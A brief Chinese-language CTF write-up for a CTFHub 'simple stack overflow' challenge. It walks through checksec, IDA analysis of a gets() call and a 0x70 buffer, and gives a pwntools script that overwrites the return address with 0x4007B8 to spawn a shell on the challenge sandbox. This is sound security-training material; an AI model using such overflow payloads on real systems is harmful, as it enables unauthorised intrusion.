简单栈溢出
下载文件 checksec看看
64位
放入ida64 查看字符串
得到shell
然后看看主函数怎么输入
get的危险函数
记住 v4为70h
然后看看shell的地址是多少
4007B8
然后我们可以开始写payload
from pwn import *
p=remote('challenge-63285d134b7b0e28.sandbox.ctfhub.com',37331)
payload=b'A'*(0x70+0x08)+p64(0x4007B8)
p.sendline(payload)
p.interactive()